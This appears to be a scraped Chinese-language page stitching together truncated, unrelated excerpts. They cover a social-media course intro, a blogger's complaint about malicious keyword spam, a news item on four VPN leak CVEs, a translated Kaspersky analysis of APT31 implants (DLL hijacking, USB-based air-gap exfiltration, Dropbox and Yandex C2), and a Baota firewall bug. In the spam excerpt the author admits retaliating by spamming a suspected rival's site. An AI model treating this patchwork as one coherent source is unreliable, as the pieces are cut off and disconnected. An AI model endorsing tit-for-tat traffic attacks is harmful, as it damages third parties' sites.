第一节课是前言部分，也就是本节课！ 第二节课呢是准备周全，万事不慌！主要讲一下我们在课程里面会用到的一些软件，以及我们的进群系统，后台会员的一个分销的一个操作！ 第三节课是QQ小世界篇！ 第四节课是B站篇！ 第五节课是视频上篇！ 第六节课是抖音篇！ 第七节课是快手篇。那么每一个平台呢，它对应的这个账号注册呢又不一样，所以呢，咱们会在接下来的每一节课里面去详细的讲解他的这个平台的一个账号的一个注册情况。 第八节课，是常见的问题解答！ 最后呢就是给大家提供的一些福利 ...

网站最近人大量的刷恶意关键词，恶意刷流量了，虽然对网站运营没有啥大影响，最多就是影响点搜索引擎的收录，对我这种小站来说没啥大的影响，但是就是有点恶心人。 正常来说，一个关键词搜索量固定，而你的流量统计显示有更多点击，有可能被刷点击，或者看到一些关键词前后带数字的这样的特殊关键词有很高的展现和点击量。 第一种应该是有人故意给你刷点击，第二种，有可能是对方在刷关键词，只不过为了模拟的更真实而点击你的网站，展现也是其刷关键词搜索而得出的结果。 如果排名持续下降，你可以向资源平台反馈，如果得到答复进行处理，你的网站排名依然下降，你还是先看看是否网站本身有什么问题，现在大部分刷量的行为，百度都可以规避。 1.可以通过屏蔽IP/访客码进行屏蔽 A.IP屏蔽： 大多数情况都是使用百度统计作为数据监控的工具。可以在固定时间段内（例如1.7.15.30天）的实时访客数据查看是否有相同的IP或者相同段的IP恶意点击，可以屏蔽IP以及访客码。 一般认为：ip段数据接近或基本完全一致，且数据量大或访问量大，初步判断为异常流量，另外可以观察访问时间短，比如说5s以内的可以看一下搜索词，如果搜索词是那种行业大词，可以判断为异常流量。 B.访客码屏蔽： 访客码可以理解为一个设备，或者一个浏览器，一般来说，一台电脑可以变化多个ip，标识码是相对唯一的，必要时屏蔽标识码来防止异常流量。 2.定期下载搜索词报告 从搜索词可以判断访客的意图，是否符合网民的搜索习惯， 在搜索引擎输入搜索一下，查看其下拉词是否为热门搜索词，一般下拉词也会有因为刷词而被送上热搜的，再进一步判断网民需求；再针对搜索结果出来的页面sem广告位进行分析： A.如果搜索词不符合我们行业需求，可以进行否词处理，避免一直被刷；若该搜索词在搜索出来的页面中没有广告位，也考虑否词，因为在此情况还能被点击，更是说明了用软件刷关键词，属于恶意刷词行为。 B.如果搜索词符合我们的需求，sem排名偏上，此时可以降低出价，减少被点击的次数。 C.有时间还有可能存在刷词的情况，如果这个词在计划或单元积累的数量较多，可以对这些关键词进行分组处理，一般是单独计划，分多个单元，单独对同类词划分后做降价或者暂停处理，等过一段时间后，可以考虑重新回调，回调的时候注意，可以选几个关键词进行小幅度的提升测试，看看还有没有可能被刷。 3.分析地域数据 可以对一段时间内的所有地域数据透视求和后进行分析，可以得到地域的来源数据，地域的数据可能跟百度后台的数据有一定的误差，毕竟百度统计的准确性本身就有不稳定性，也跟安装代码和网站的问题有关，所以不能作为参考的唯一标准。 如果发现异常的地域数据进行ip和搜索词检查，参考上面的操作步骤进行检查。很多时候对于一些成熟的竞价员，一看地域数据就知道是否流量正常了。 如果正常，计算出各个地域的占比，再下载百度后台的地域消费报告进行分析其合理性。可能出现一定误差，只要在合理的比例范围内即可。 如果发现地域ip异常，应该透析后筛选数据最多的ip，对这部分ip进行定位测试，找到ip所在地，看是否为同行所在地，进行屏蔽。 屏蔽ip不是一劳永逸的，主要是起到监控的作用，大家都知道IP会变化，而且IP屏蔽也是有上限的，可以定期根据我们的实时访客报表把以前屏蔽过的做一个检查，有些IP可能可以从屏蔽里面放出来，来增加账户的流量。 我为网站安装了屏蔽插件，效果还是不错的，直接屏蔽了很大一部分，屏蔽IP不太现实因为是动态IP无法防住，本人又用了一个反弹代码，直接反弹相关内容具体我就不详细讲，有需要的单独联系我吧，效果也是不错的，再就是我仔细考虑了到底是最近得罪了哪位高人，没事闲着这样折腾，从攻击时间及近期的时间线上我想到了一个非常有可能的人，所以我就以彼之道还施彼身，你给我刷恶意关键词，我也给你刷恶意关键词，你停止我就停止，当天晚上刷完，第二天就停止，不管是不是因为我刷流量的关系，我只能说做人要善良，都是做网站的人，有必要这样搞吗？好好搞自己网站吧。...

近日，纽约大学和鲁汶大学的研究人员发现大多数VPN产品中都存在长达二十多年的多个漏洞，攻击者可利用这些漏洞读取用户流量、窃取用户信息，甚至攻击用户设备。 “我们的攻击所需的计算资源并不昂贵，这意味着任何具有适当网络访问权限的人都可以实施这些攻击，且不受VPN安全协议限制。换而言之，无论VPN使用何种安全协议，所发现的漏洞都可能被滥用。即使是声称使用“军用级加密”或使用自行开发的加密协议的VPN（包括微软和苹果操作系统的内置VPN）也可能受到攻击。”纽约大学的Nian Xu声称： “即使受害者使用了HTTPS加密，我们的攻击也会泄露用户正在访问哪些网站，这可能会带来重大的隐私风险。” 四大数据泄露漏洞危及全球VPN客户端 研究者发现的四个普遍存在的VPN漏洞的CVE编号分别是：CVE-2023-36672、CVE-2023-35838、CVE-2023-36673和CVE-2023-36671。 CVE-2023-36672：LocalNet攻击导致明文流量泄漏。参考CVSS分数为6.8。 CVE-2023-35838：LocalNet攻击导致流量阻塞。参考CVSS分数为3.1。 CVE-2023-36673：ServerIP攻击与DNS欺骗相结合，可以将流量泄漏到任意IP地址。参考CVSS分数为7.4。 CVE-2023-36671：ServerIP攻击，只有VPN服务器真实IP地址的流量才会被泄露。参考CVSS分数为3.1。 第一对漏洞可在LocalNet攻击中被利用，即当用户连接到攻击者设置的Wi-Fi或以太网时（下图）： LocalNet攻击示意图 后一对漏洞可被攻击者或恶意互联网服务提供商(ISP)所利用，通过不受信任的Wi-Fi/以太网发动ServerIP攻击。 ServerIP攻击示意图 研究人员表示：“这两种攻击都会操纵受害者的路由表，诱骗受害者将流量发送到受保护的VPN隧道之外，从而使对手能够读取和拦截传输的流量。” 除了数据泄露，此类攻击还产生另外一个风险：VPN通常用于保护较旧或不安全的协议，VPN防护失效意味着攻击者随后可以攻击较旧或不安全的协议，例如RDP、POP、FTP、telnet等。 研究者公布了多种攻击的视频演示 （https://www.**屏蔽敏感词**/watch?v=vOawEz39yNY&t=52s），还发布了可用于检查VPN客户端是否易受攻击的脚本（https://github.com/vanhoefm/vpnleaks）。 研究人员补充说：“一旦足够多的VPN设备修补了有关漏洞，如果有必要和/或有益，攻击脚本也将被公开发布。” 苹果设备VPN客户端几乎“全军覆没” 在测试了许多消费者和企业级VPN解决方案后，研究人员发现苹果设备上的VPN客户端几乎全军覆没（无论是Mac电脑、iPhone或iPad），Windows和Linux设备的VPN也很容易受到上述一种或两种攻击。在Android设备上，只有四分之一左右的VPN应用程序容易受到攻击——这可能与Android“精心设计”的API有关。 如上图所示，大多数Windows、macOS和iOS的内置VPN客户端都容易受到攻击，超过三分之一的Linux上的VPN客户端也是如此。 研究人员表示，他们并不知道这些漏洞是否在野外被利用，如果有的话，也很难发现。 据悉，研究人员已经向一些VPN供应商通报了他们发现的漏洞，其中一些供应商已经修复了漏洞，但却没有在更新说明中提及（以遵守研究人员在其研究发表之前的保密要求）。 研究人员在论文的末尾提供了各种设备上经过测试的VPN应用程序的完整列表，可供用户检查自己的VPN应用/客户端是否容易受到攻击。 缓解建议 研究人员指出：“一些VPN产品已经修复漏洞，包括Mozilla VPN、Surfshark、Malwarebytes、Windscribe（可以导入OpenVPN配置文件）和Cloudflare的WARP。” 思科已确认其适用于Linux、macOS和Windows的思科安全客户端和AnyConnect安全移动客户端容易受到CVE-2023-36672的影响，但仅限于特定的非默认配置。Mulvad则表示只有其iOS应用程序容易受到LocalNet攻击。 如果用户的VPN安全更新不可用，研究人员给出的建议是通过禁用本地网络访问来缓解LocalNet攻击。用户还可以通过确保网站使用HTTPS来缓解攻击，现在大多数网站都支持HTTPS。...

2022年，卡巴斯基研究人员调查了一系列针对东欧工业组织的攻击活动。在这些活动中，攻击者的目标是建立一个永久的数据泄露渠道，包括存储在气隙（air-gapped）系统中的数据。 基于这些攻击活动与之前研究过的攻击活动（如ExCone、DexCone）存在诸多相似之处，包括使用的FourteenHi变体、特定的TTP和攻击范围，研究人员非常自信地认为，这些攻击活动背后是一个名为APT31（也被称为“Judgment Panda”和“Zirconium”）的威胁组织。 为了泄露数据并交付下一阶段的恶意软件，威胁行为者滥用基于云的数据存储（例如Dropbox或Yandex Disk）以及用于临时文件共享的服务。他们还使用部署在常规虚拟专用服务器（VPS）上的C2。此外，威胁行为者还会部署一系列植入程序，通过受感染的可移动驱动器从气隙网络收集数据。 对于大多数植入程序，威胁行为者使用了类似的DLL劫持实现（通常与Shadowpad恶意软件相关）和内存注入技术，以及使用RC4加密来隐藏有效载荷并逃避检测。libssl. dll或libcurl.dll被静态链接到植入程序以实现加密的C2通信。 研究人员总共发现了超过15个植入物及其变体。具体来说，攻击中使用的整个植入程序堆栈可以根据其作用分为三类： 用于持久远程访问和初始数据收集的第一阶段植入程序； 用于收集数据和文件的第二阶段植入程序； 第三阶段植入程序和上传数据到C2的工具。 用于远程访问的第一阶段植入程序  FourteenHi变体 FourteenHi是一个恶意软件家族，于2021年在一个名为ExCone的活动中被发现，自2021年3月中旬以来一直保持活跃状态，目标主要是政府实体。在2022年，研究人员发现了用于攻击工业组织的新变种。 各种各样的FourteenHi样本（包括x64和x86）在代码结构、i加载器和C2类型方面都有很大的不同。但是它们的核心特征（如C2通信协议和命令列表）几乎是相同的。 加载方案大体相同的所有变体，包括三个主要组成部分： 易受DLL劫持的合法应用程序。 通过DLL劫持加载的恶意DLL，用于从二进制数据文件中读取和解密FourteenHi有效载荷，并将其注入某些系统进程，如exe或msiexec.exe。 一个二进制数据文件，包含用RC4加密的FourteenHi二进制代码。 所有已知的FourteenHi变体都在其代码中嵌入了配置数据并使用RC4加密。配置定义了活动ID、C2地址和端口。fourenhi x64的配置还定义了它在不带参数执行时为持久化创建的Windows服务的名称和描述。 MeatBall后门 MeatBall后门是研究人员在分析攻击过程中发现的新植入程序。它具有广泛的远程访问功能，包括列出正在运行的进程、连接的设备和磁盘、执行文件操作、捕获屏幕截图、使用远程shell和自我更新。该植入存在于x86和x64的变体中。 该植入程序还使用基于DLL劫持技术的加载方案，但与许多其他植入程序不同的是，其有效载荷存储在恶意DLL加载程序本身中，而不是单独的文件中。 该植入程序与libssl.dll静态链接，以实现加密的C2通信。 植入程序使用Yandex Cloud作为C2 研究人员发现的另一个植入程序是使用Yandex Cloud数据存储作为C2。该植入程序使用基于DLL劫持的加载方案，恶意DLL将存储在单独文件中的植入程序主体解密，并将其注入合法进程的内存中。 该植入程序同样使用静态链接的libcurl.dll进行SSL加密通信，并在主机上收集以下数据： 计算机名； 用户名； IP地址； MAC地址； 操作系统版本； 通往%System%的路径 为了将收集到的数据上传到C2，该植入程序使用嵌入式API令牌发送一个请求，以创建一个目录，该目录的名称对受害主机来说是唯一的。 所有上传和下载的数据均采用RC4算法加密。 用于收集数据和文件的第二阶段植入程序 用于收集本地文件的专用植入程序 2022年5月，研究人员发现了一个用于收集本地文件的专用植入程序。该植入程序使用基于DLL劫持技术的加载方案，其中恶意DLL加载程序通过创建名为“WinSystemHost”的服务来确保持久性，解密并将作为二进制数据存储在单独文件中的有效负载注入到合法进程的内存中。 该植入程序启动“msiexec.exe”，然后从单独的文件读取和解密有效载荷，并将其注入“msiexec.exe”的内存中。 一旦负载开始在“msiexec.exe”的内存中执行，它就会进入由下述6个简单步骤组成的无限循环： 创建文件存储文件夹（如果不存在的话），并找到通往“exe”的路径； 解密字符串； 读取配置并开始搜索所有磁盘上的文件； 复制文件和写日志； 将复制的文件归档并清理； 等待10分钟。 为了渗漏收集到的数据，威胁行为者还使用了一系列植入程序将文档上传到Dropbox。 通过可移动驱动器从气隙网络中窃取数据的植入程序 2022年4月，研究人员发现了一款旨在通过感染可移动驱动器从气隙系统中窃取数据的恶意软件。 【植入程序与可移动介质相互作用的简化图】 第一个（主）模块负责处理可移动驱动器，包括如下操作： 收集驱动器信息； 将每个驱动器的文件系统结构克隆到本地临时文件夹中，并保持结构更新至最新状态； 从硬盘中收集被盗文件并在新连接的硬盘上植入第二步恶意软件； 捕获受感染计算机上的屏幕截图和窗口标题。 该主模块在“%TEMP%”中创建一个文件夹，它将在其中存储日志、连接驱动器的信息和驱动器的内容。 接下来，该植入程序对每个可移动驱动器都创建了一个子文件夹，其中子文件夹的名称与驱动器的序列号相同。 该植入程序还会检查这些文件夹中是否存在以下文件，这些文件可用于感染序列号与文件夹名称匹配的可移动驱动器： “exe”，一个合法的McAfee可执行文件，易受DLL劫持； “dll”，这是第二步有效载荷； “DOC”、“PDF”或“DIR”文件，其中定义了要使用的诱饵链接文件。 上述文件存在于分配给特定可移动驱动器的文件夹中，表明攻击者首先分析了可移动驱动器的内容一段时间，然后才将用于感染特定可移动驱动器的文件复制到指定的文件夹中。 要感染可移动驱动器，主模块只需复制两个文件——“mcods.exe”和第二步恶意软件“McVsoCfg.dll”——到驱动器的根目录，并为这两个文件设置“隐藏”属性。 此外，如果存在第四步恶意软件，它也会与第二步植入程序一起复制到可移动驱动器中。 然后，主模块在可移动驱动器的根目录中生成一个诱饵链接文件。 当用户打开诱饵“.lnk”文件时，操作系统将加载“mcods.exe”，该文件又将加载“McVsoCfg.dll”，并调用其函数“McVsoCfgGetObject”。 【通过受感染的可移动媒介染隔离网段中的计算机的简化图】 之后，该植入程序通过从自己的文件（“McVsoCfg.dll”）中提取第三步恶意软件可执行文件，并将其以“msgui.exe”的名称保存到被攻击主机上的“%APPDATA%”中。 第三步植入程序“msgui.exe”非常小且简单——它被设计成使用“cmd.exe”执行批处理脚本来收集数据，并将输出保存到驱动器的“$RECYCLE.BIN”文件夹中，以便恶意软件的主模块（当连接到最初受感染的主机时）可以收集数据。然后，它会查找要执行的任何第四步文件，然后将其删除（如果存在的话）。 第四步恶意软件由两个文件组成： 有效载荷的简单dropper（类似于第二步恶意软件所使用的）； 该有效载荷实际上是第一步模块的修改版本，也用于收集有关驱动器的信息，收集文件，捕获屏幕截图和按键（当连接到最初受感染的主机时），但没有负责感染可移动驱动器的例程。 两个模块（第一步和第四步）具有相似的配置和数据保存例程： 【通过受感染的可移动媒体在隔离的网段中收集数据的简化图】 为了收集所有被盗数据，威胁行为者使用远程shell来运行旨在上传数据的植入程序。 第三阶段植入程序和上传数据到C2的工具 第三阶段植入程序由威胁行为者通过第一阶段植入程序和第二阶段植入程序进行部署。 第三阶段植入程序与第一阶段植入程序有很多共同之处，包括使用基于云的数据存储（例如Dropbox、Yandex Disk），代码混淆以及实施DLL劫持技术。 用于上传文件到Dropbox的植入程序 一系列用于上传文件到Dropbox的植入程序，被设计成与第二阶段的文件收集植入程序协同工作。 该恶意软件堆栈由三个植入程序组成，形成一个直接的执行链（由三个步骤组成）。 第一步用于持久化，部署和启动第二步恶意软件模块，该模块负责通过调用第三步植入程序将收集到的文件上传到服务器。 在分析中，研究人员确定了在初始攻击几个月后部署的第三步植入程序的五个变体，以及第二步植入程序的两个变体。 执行链中第二步植入的第一个变体旨在解密第三步有效载荷并将其注入合法进程（例如“msiexec.exe”）。除了C2地址外，该链中第三步有效载荷的所有变体几乎相同。 第三步变体中的C2 IP地址引起了研究人员的注意，因为它是本地IP地址。这意味着威胁行为者在公司内部部署了一台C2，并将其用作代理，从无法直接访问互联网的主机上窃取数据。 后来，攻击者部署了第二步植入程序的新变种，其功能包括查找Outlook文件夹中的文件名（即电子邮件帐户名称），执行远程命令，并通过调用第三步植入程序将本地或远程“.rar”文件上传到Dropbox。 要上传本地文件，第二步植入程序要调用第三步植入程序，后者应该已经部署在机器上的静态定义路径“c:/users/public/”或与第二步植入相同的路径上。 所有第三步变体都旨在将从本地机器的“C:\ProgramData\NetWorks\ZZ”收集到的“.rar”文件上传到Dropbox。 手动数据渗漏工具 除了各种植入程序外，研究人员还发现了威胁行为者用于手动数据渗漏的两种工具。 一个名为“AuditSvc.exe”的工具被设计用于上传和下载任意文件到Yandex Disk。OAuth令牌、文件路径和其他一些参数可以作为命令行参数传递。或者，这些参数可以在一个名为“MyLog.ini”的配置文件中定义。 第二个被发现的工具名为“transfer.exe”，旨在从16个支持的临时文件共享服务中任意上传和下载任意文件。 通过Yandex电子邮件服务上传文件的植入程序 通过Yandex电子邮件服务发送文件的植入程序是从Yandex Disk下载的。它还与libcurl.dll进行了静态链接。 该植入程序旨在窃取位于静态路径“C:\Users\Public\Downloads\111.log”的单个文件（该文件已硬编码到植入程序中）。“.log”文件作为附件发送到电子邮件。 “111.log”文件很可能是由前一阶段的植入程序之一产生的，并且可能包含CMD命令的输出或通过上述工具上传到临时数据共享服务的文件的URL。 在一次发送电子邮件的尝试之后，该植入程序就会终止。这样的直接执行流和持久化功能的缺乏可能意味该植入程序更多地被用作一种工具，而非自给自足的服务。 结语 在这项报告中，研究人员分析了威胁行为者用于远程访问、收集数据和上传数据的大量植入程序。 威胁行为者通过将有效载荷以加密形式隐藏在单独的二进制数据文件中，以及通过DLL劫持和内存注入链将恶意代码隐藏在合法应用程序的内存中，使检测和分析威胁变得更加困难。 滥用云服务（例如，Dropbox、Yandex、Google等）的趋势并不新鲜，但它仍在继续扩大，因为当组织的业务流程依赖于这些服务时，想要限制/缓解这种趋势将变得异常艰难。 与此同时，滥用流行的基于云的数据存储，一旦第三方访问威胁行为者使用的存储，就有可能导致被盗数据的二次泄露。 原文链接： https://securelist.com/common-ttps-of-attacks-against-industrial-organizations/110319/ ...

对宝塔的Nginx防火墙进行卸载重装或者点过修复后，重新导入数据发现有问题，通过宝塔的备份功能导入的数据ip黑白名单会失效。 今下午突然发现网站对CDN节点ip进行了错误拦截导致无法访问，很莫名其妙，我防火墙明明添加了ip白名单竟然还会拦截。 第一时间怀疑是Fail2ban防爆破插件导致的问题，筛查后排除。 然后排查到宝塔专业版Nginx防火墙上，查看添加的ip白名单和黑名单，没有问题，数据导入后都在。 但是我重新添加ip白名单的时候发现竟然能重复添加？这就有问题了，如果是正常情况下重复添加会有提示的，而宝塔Nginx防火墙我今天刚新安装的应该没有问题，于是怀疑到了宝塔的这个导入导出备份功能。 然后我删掉全部ip白名单手动添加，还是拦截，感觉问题有点大，就把黑名单也清空了。 然后宝塔防火墙正常工作，不再误拦截。 这说明宝塔Nginx防火墙的导入配置导出配置功能是有问题的，重新导入的ip黑白名单混乱，导致异常拦截。 如果你也是碰到这种问题，就把ip黑白名单全部清空然后手动添加吧，不要用宝塔的备份功能。 宝塔防火墙问题版本：Nginx防火墙 9.2.1...